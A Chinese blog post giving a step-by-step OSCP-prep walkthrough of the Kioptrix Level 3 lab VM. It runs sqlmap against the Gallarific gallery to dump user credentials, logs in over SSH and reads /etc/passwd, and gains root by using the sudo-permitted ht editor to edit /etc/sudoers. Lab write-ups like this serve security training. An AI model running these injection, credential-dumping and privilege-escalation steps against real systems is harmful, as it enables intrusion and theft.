OSCP备战-kioptrixvm3详细解法

small_white_robot2025-05-12 14:32

探测IP

复制代码 
arp-scan -l

得出目标IP:192.168.155.165

也可以使用

复制代码 
netdiscover -i eth0 -r 192.168.155.0/24

也可以使用

复制代码 
nmap -sN 192.168.155.0/24 --min-rate 1000

修改hosts文件

找到IP后,通过之前读取README.txt了解到,我们需要编辑hosts文件,将其指向kioptrix3.com

输入命令:

复制代码 
sudo nano /etc/hosts

添加一行如图所示:

复制代码 
192.168.155.165 kioptrix3.com

按下ctrl+x保存退出

端口扫描

复制代码 
nmap -sV -sT --min-rate 1000 -p1-65535 IP

结果:

Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-08 08:49 EDT

Nmap scan report for 192.168.155.165

Host is up (0.0050s latency).

Not shown: 65533 closed tcp ports (conn-refused)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with

80端口

访问一下

拿dirsearch 扫一下看看

复制代码 
dirsearch -u http://192.168.155.165 -e *

访问一下试试:

192.168.155.165/phpmyadmin/index.php

尝试无密码登录:admin

进入后台

no privileges提示我们没有权限,显示即为一个虚拟数据库

尝试爆破了一下,没出结果

回到主页,能点的都点一下

博客给了一个网页http://kioptrix3.com/gallery,和主页点击now跳转网页是一样的

点击login又是一个登录框

最开始我们就改了hosts文件,访问一下http://kioptrix3.com站点

如图:

明显跟之前的页面不一样,在那dirsearch扫一下

复制代码 
dirsearch -u http://kioptrix3.com/gallery -e *

访问得到:

Gallarific 2.1 - Free Version released October 10, 2009

搜一下searchsploit Gallarific

有一个注入漏洞的

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch

数据库:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --dbs

现在连接的数据库:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --current-db

DBMS用户:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --current-user

发现是root用户

表:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery --tables

字段:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery -T gallarific_users --columns

值:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery -T gallarific_users -C "username,password" --dump

得到登录结果:
admin/n0t7t1k4

如此尝试,发现在dev_accounts中,得到了两组用户名和密码

尝试进行连接,只有后两组密码可以连接

复制代码 
ssh -oHostKeyAlgorithms=+ssh-rs- loneferret@192.168.155.165

查看查看:

复制代码 
cat /etc/passwd

列出当前用户家目录下的所有文件和文件夹:

复制代码 
ls -al

读取文件:

复制代码 
cat CompanyPolicy.README

查看权限:

复制代码 
sudo -l

根据提示执行:

复制代码 
sudo /usr/local/bin/ht

报错

执行命令:

复制代码 
echo $TERM
export TERM=xterm
echo $TERM

重新执行

复制代码 
sudo /usr/local/bin/ht


按住F3,输入/etc/sudoers

回车.当用户执行sudo命令时,系统会到/etc/sudoers文件中寻找相关信息来判断该用户是否具有执行sudo的权限,所以我们修改sudoers文件,试用户loneferret具有使用sudo执行/bin/bash的权限,以达到提权的目的。

修改配置添加一行

复制代码 
loneferret ALL=(ALL) ALL

F2保存,ctral+c退出

执行命令

复制代码 
sudo /bin/bash

成功

相关推荐
Suckerbin9 小时前
digitalworld.local: TORMENT
笔记·安全·web安全·网络安全
普通网友10 小时前
前端安全攻防:XSS, CSRF 等防范与检测
前端·安全·xss
绝世剑仙纪宁10 小时前
TCP 三次握手、四次挥手
网络·网络协议·tcp/ip
索迪迈科技10 小时前
HTTP中Payload的含义解析
网络·网络协议·http
时空潮汐11 小时前
我用神卓 NAT 公网 IP 盒子搭建《我的世界》联机的经历
网络·网络协议·tcp/ip
liulilittle11 小时前
HTTP/3.0:网络通信的技术革新与性能飞跃
网络·网络协议·http·https·quic·流媒体·通信
CYRUS_STUDIO11 小时前
如何防止 so 文件被轻松逆向?精准控制符号导出 + JNI 动态注册
android·c++·安全
CYRUS_STUDIO11 小时前
C&C++ 代码安全再升级:用 OLLVM 给 so 加上字符串加密保护
c++·安全·llvm
岑梓铭11 小时前
计算机网络第四章(4)——网络层《ARP协议》
网络·笔记·tcp/ip·计算机网络·考研·408
lingggggaaaa11 小时前
小迪安全v2023学习笔记(八十讲)—— 中间件安全&WPS分析&Weblogic&Jenkins&Jetty&CVE
笔记·学习·安全·web安全·网络安全·中间件·wps
热门推荐
01UV安装并设置国内源02A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程03UV 工具安装与国内镜像源配置指南04解决 WSL Ubuntu 中 /etc/resolv.conf 自动重置问题05教你如何认证 Gemini 教育优惠的二次验证,薅个 1年的 Gemini Pro 会员06conda中设置镜像地址(附所有可换的地址)07突破百度网盘的下载限速,两种方法教会你【超详细】08KGG转MP3工具|非KGM文件|解密音频092025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定 完整成品思路模型代码分享,全网首发高质量!!!10Nano Banana免费方案来了!Docker 一键部署 + 魔搭即开即用,小白也能玩转 AI 图像编辑